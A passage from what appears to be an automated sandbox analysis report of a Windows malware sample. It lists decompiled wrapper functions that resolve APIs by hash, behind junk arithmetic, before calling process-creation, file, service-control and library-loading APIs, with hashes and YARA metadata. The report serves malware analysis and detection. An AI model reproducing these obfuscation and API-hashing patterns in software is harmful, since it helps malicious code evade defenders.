                                                      			E001F976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001E602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001F07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                                      0x001f9772
                                                      0x001f9773
                                                      0x001f9778
                                                      0x001f977a
                                                      0x001f977b
                                                      0x001f977e
                                                      0x001f977f
                                                      0x001f9782
                                                      0x001f9785
                                                      0x001f9788
                                                      0x001f9789
                                                      0x001f978c
                                                      0x001f978f
                                                      0x001f9790
                                                      0x001f9791
                                                      0x001f9794
                                                      0x001f9797
                                                      0x001f979a
                                                      0x001f979d
                                                      0x001f97a0
                                                      0x001f97a3
                                                      0x001f97a6
                                                      0x001f97a7
                                                      0x001f97a8
                                                      0x001f97ad
                                                      0x001f97b7
                                                      0x001f97c3
                                                      0x001f97ca
                                                      0x001f97d1
                                                      0x001f97d8
                                                      0x001f97df
                                                      0x001f97e3
                                                      0x001f97fc
                                                      0x001f9816
                                                      0x001f981d

                                                      APIs
                                                      • CreateProcessW.KERNEL32(001E591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001E591A), ref: 001F9816
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction ID: 86c2c147634ef3138d853ec8a87c4843de297417a20e506b2cc7360b5490e1f8
                                                      • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction Fuzzy Hash: 1D11B372901188BBDF1A9FD6DC0ACDF7F7AEF99750F104148FA1556120D2728A60EBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001EB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 31%
                                                      			E001EB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001E602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001F07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                                      0x001eb569
                                                      0x001eb56a
                                                      0x001eb56d
                                                      0x001eb572
                                                      0x001eb574
                                                      0x001eb577
                                                      0x001eb57a
                                                      0x001eb57d
                                                      0x001eb580
                                                      0x001eb583
                                                      0x001eb586
                                                      0x001eb587
                                                      0x001eb58a
                                                      0x001eb58d
                                                      0x001eb590
                                                      0x001eb593
                                                      0x001eb594
                                                      0x001eb595
                                                      0x001eb59a
                                                      0x001eb5a4
                                                      0x001eb5b8
                                                      0x001eb5c0
                                                      0x001eb5c4
                                                      0x001eb5cb
                                                      0x001eb5d2
                                                      0x001eb5d9
                                                      0x001eb5e6
                                                      0x001eb5fd
                                                      0x001eb604

                                                      APIs
                                                      • CreateFileW.KERNELBASE(001F0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001F0668,?,?,?,?), ref: 001EB5FD
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction ID: 64c03b7127ba3bee54388474f9df1fc94ff169f200a39c6328bbd3ed7b90b682
                                                      • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction Fuzzy Hash: 2A11C372801248BBDF16DF95DD06CEE7F7AFF99714F148198FA1862120D3729A60EB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001F981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E001F981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001E602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001F07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                                      0x001f9821
                                                      0x001f9822
                                                      0x001f9825
                                                      0x001f9828
                                                      0x001f982a
                                                      0x001f982c
                                                      0x001f982f
                                                      0x001f9832
                                                      0x001f9835
                                                      0x001f9836
                                                      0x001f9837
                                                      0x001f983c
                                                      0x001f9855
                                                      0x001f9858
                                                      0x001f985f
                                                      0x001f9866
                                                      0x001f986d
                                                      0x001f9874
                                                      0x001f987b
                                                      0x001f988e
                                                      0x001f989b
                                                      0x001f98a2

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001E87F2,0000CAAE,0000510C,AD82F196), ref: 001F989B
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction ID: 1bf3bad15c3aece8f2b403b3292d11e26047bfd38b1ea934f0c7b56989d86508
                                                      • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction Fuzzy Hash: 0B019A72801208FBDB04EFD5D846CDFBF79EF95750F108188F908A6220E6715B619BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001F7BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E001F7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001E602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001F07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                                      0x001f7bf7
                                                      0x001f7bf8
                                                      0x001f7bfa
                                                      0x001f7bfd
                                                      0x001f7bff
                                                      0x001f7c02
                                                      0x001f7c06
                                                      0x001f7c07
                                                      0x001f7c0f
                                                      0x001f7c1d
                                                      0x001f7c25
                                                      0x001f7c2d
                                                      0x001f7c31
                                                      0x001f7c38
                                                      0x001f7c3f
                                                      0x001f7c46
                                                      0x001f7c4a
                                                      0x001f7c5e
                                                      0x001f7c67
                                                      0x001f7c6d

                                                      APIs
                                                      • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001F7C67
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileOperation
                                                      • String ID:
                                                      • API String ID: 3080627654-0
                                                      • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction ID: ce09fedc50eca9e1d2d8f728837780fab95cf825b4c8fb3014b54b06bea60826
                                                      • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction Fuzzy Hash: E5014FB190120CFFEB09DF94C84A8DE7BB9EF54314F108198F505A7250E7B15F509B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001EF65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 52%
                                                      			E001EF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001E602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001F07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                                      0x001ef662
                                                      0x001ef663
                                                      0x001ef665
                                                      0x001ef668
                                                      0x001ef66a
                                                      0x001ef66d
                                                      0x001ef670
                                                      0x001ef673
                                                      0x001ef677
                                                      0x001ef678
                                                      0x001ef67d
                                                      0x001ef687
                                                      0x001ef693
                                                      0x001ef69a
                                                      0x001ef6a1
                                                      0x001ef6a5
                                                      0x001ef6a9
                                                      0x001ef6b0
                                                      0x001ef6c9
                                                      0x001ef6d8
                                                      0x001ef6de

                                                      APIs
                                                      • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001EF6D8
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: OpenService
                                                      • String ID:
                                                      • API String ID: 3098006287-0
                                                      • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction ID: 8d5c33ce5b49c7f96cbb9769759cca5bbcc1b768e543c718b67643f59ff8d05f
                                                      • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction Fuzzy Hash: C001E5B690120CBBEF05AF94DC068DF7F79EB15364F148188F90462251D7B25E61DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001EB6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E001EB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E001E602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001F07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                                      0x001eb6f3
                                                      0x001eb6f8
                                                      0x001eb702
                                                      0x001eb70b
                                                      0x001eb712
                                                      0x001eb719
                                                      0x001eb720
                                                      0x001eb727
                                                      0x001eb72e
                                                      0x001eb747
                                                      0x001eb759
                                                      0x001eb75e

                                                      APIs
                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001EB759
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileHandleInformation
                                                      • String ID:
                                                      • API String ID: 3935143524-0
                                                      • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction ID: f9da5785dbd9570073441e0a55d7972b48b4dfa7cb78d73ba810e2c20631ceef
                                                      • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction Fuzzy Hash: 4A0128B694130CFBEB45DF94DD06A9E7BB5EB18704F108188FA09661A1D3B25A20AB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001FAA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E001FAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001E602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001F07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                                      0x001faa3f
                                                      0x001faa40
                                                      0x001faa41
                                                      0x001faa44
                                                      0x001faa47
                                                      0x001faa4b
                                                      0x001faa4c
                                                      0x001faa51
                                                      0x001faa5b
                                                      0x001faa64
                                                      0x001faa68
                                                      0x001faa6f
                                                      0x001faa76
                                                      0x001faa8d
                                                      0x001faa90
                                                      0x001faa9d
                                                      0x001faaa8
                                                      0x001faaad

                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001FAAA8
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction ID: ae75e7940aa0f3f516375c71d7746bc297ccf3d88e33e1714b6200cce300473c
                                                      • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction Fuzzy Hash: 0CF069B190020CFFDF08EF94DD4A89EBFB8EB44304F108188F905A6261D3B29B549B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001E5FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E001E5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001E602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001F07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                                      0x001e5fb5
                                                      0x001e5fb6
                                                      0x001e5fb7
                                                      0x001e5fbb
                                                      0x001e5fbc
                                                      0x001e5fc1
                                                      0x001e5fcb
                                                      0x001e5fd7
                                                      0x001e5fde
                                                      0x001e5fe5
                                                      0x001e5ffc
                                                      0x001e5fff
                                                      0x001e6006
                                                      0x001e600d
                                                      0x001e601a
                                                      0x001e6025
                                                      0x001e602a

                                                      APIs
                                                      • CloseServiceHandle.ADVAPI32(39CCF342), ref: 001E6025
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID:
                                                      • API String ID: 1725840886-0
                                                      • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction ID: f4d9d5f24093db104dc701dd67091ce2778e05ea5050f4393f3df9c3ed5d6a3d
                                                      • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction Fuzzy Hash: 38F04FB0C1120CFFDB08DFA0E94689EBFB8EB50340F208198E909A7261E7715F559F54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: rundll32.exe PID: 2932 Parent PID: 2712 rundll32.exeCOMMON

                                                      Executed Functions

                                                      Function 001D2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E001D2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001D602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001E07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                                      0x001d295f
                                                      0x001d2964
                                                      0x001d2967
                                                      0x001d296a
                                                      0x001d296d
                                                      0x001d296e
                                                      0x001d296f
                                                      0x001d2977
                                                      0x001d2985
                                                      0x001d298a
                                                      0x001d2992
                                                      0x001d299a
                                                      0x001d29a2
                                                      0x001d29a9
                                                      0x001d29b0
                                                      0x001d29b7
                                                      0x001d29bb
                                                      0x001d29cf
                                                      0x001d29dc
                                                      0x001d29e2

                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001D29DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: <^
                                                      • API String ID: 1889721586-3203995635
                                                      • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction ID: 2def957fbdd76c8f6afaa0a2bd22bc4160f696d70807745a4914eae7dc807cb6
                                                      • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction Fuzzy Hash: A6018072A00108BFEB14DF95DC4A8DFBFB6EF48310F108089F508A6250D7B65F619B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001DC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E001DC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001D602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001E07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                                      0x001dc6e1
                                                      0x001dc6e6
                                                      0x001dc6f0
                                                      0x001dc6fc
                                                      0x001dc703
                                                      0x001dc706
                                                      0x001dc70d
                                                      0x001dc711
                                                      0x001dc715
                                                      0x001dc71c
                                                      0x001dc723
                                                      0x001dc72a
                                                      0x001dc731
                                                      0x001dc738
                                                      0x001dc751
                                                      0x001dc762
                                                      0x001dc768

                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001DC762
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: /O
                                                      • API String ID: 1514166925-1923427199
                                                      • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction ID: 4a01790a23612c8bc0685b17fe082e26f4db6c5654d638d0cee67d8c555ea358
                                                      • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction Fuzzy Hash: D31133B290122DBBCB25DF95DC498DFBFB8EF14714F108188F90962210D3B14B659BE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001D1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E001D1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001D602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001E07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                                      0x001d1006
                                                      0x001d1009
                                                      0x001d100c
                                                      0x001d1011
                                                      0x001d1016
                                                      0x001d101d
                                                      0x001d1026
                                                      0x001d102d
                                                      0x001d1034
                                                      0x001d103b
                                                      0x001d1047
                                                      0x001d104f
                                                      0x001d1057
                                                      0x001d105e
                                                      0x001d1065
                                                      0x001d106c
                                                      0x001d1073
                                                      0x001d1077
                                                      0x001d108b
                                                      0x001d1096
                                                      0x001d109b

                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0033A3B7), ref: 001D1096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: [
                                                      • API String ID: 1029625771-3431493590
                                                      • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction ID: 6c9247c1494e0430e7af192e2c9ebdad8a4dc037f7a170ec8d45a2d22dfa5ef9
                                                      • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
